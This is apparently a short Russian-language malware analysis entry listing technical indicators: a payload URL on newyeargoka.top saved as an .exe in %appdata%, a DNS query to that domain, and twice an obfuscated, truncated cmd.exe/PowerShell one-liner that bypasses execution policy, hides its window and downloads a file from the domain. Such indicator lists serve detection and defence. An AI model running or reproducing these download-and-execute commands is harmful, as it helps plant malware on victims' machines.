Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowErs^h^Ell.^exE -e^xe^C^uTI^OnpoLic^Y^ ByPA^Ss ^-N^O^p^RoFi^LE -^Wi^Ndo^W^s^Ty^lE^ H^iDDe^n^ (N^ew-obj^Ect S^Ys^tEm.^Net.wEb^c^l^I^E^nT).dO^wNl^o^adFi^L^E^('http://newyeargoka.top...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "PowErs^h^Ell.^exE -e^xe^C^uTI^OnpoLic^Y^ ByPA^Ss ^-N^O^p^RoFi^LE -^Wi^Ndo^W^s^Ty^lE^ H^iDDe^n^ (N^ew-obj^Ect S^Ys^tEm.^Net.wEb^c^l^I^E^nT).dO^wNl^o^adFi^L^E^('http://newyeargoka.top...' (со скрытым окном)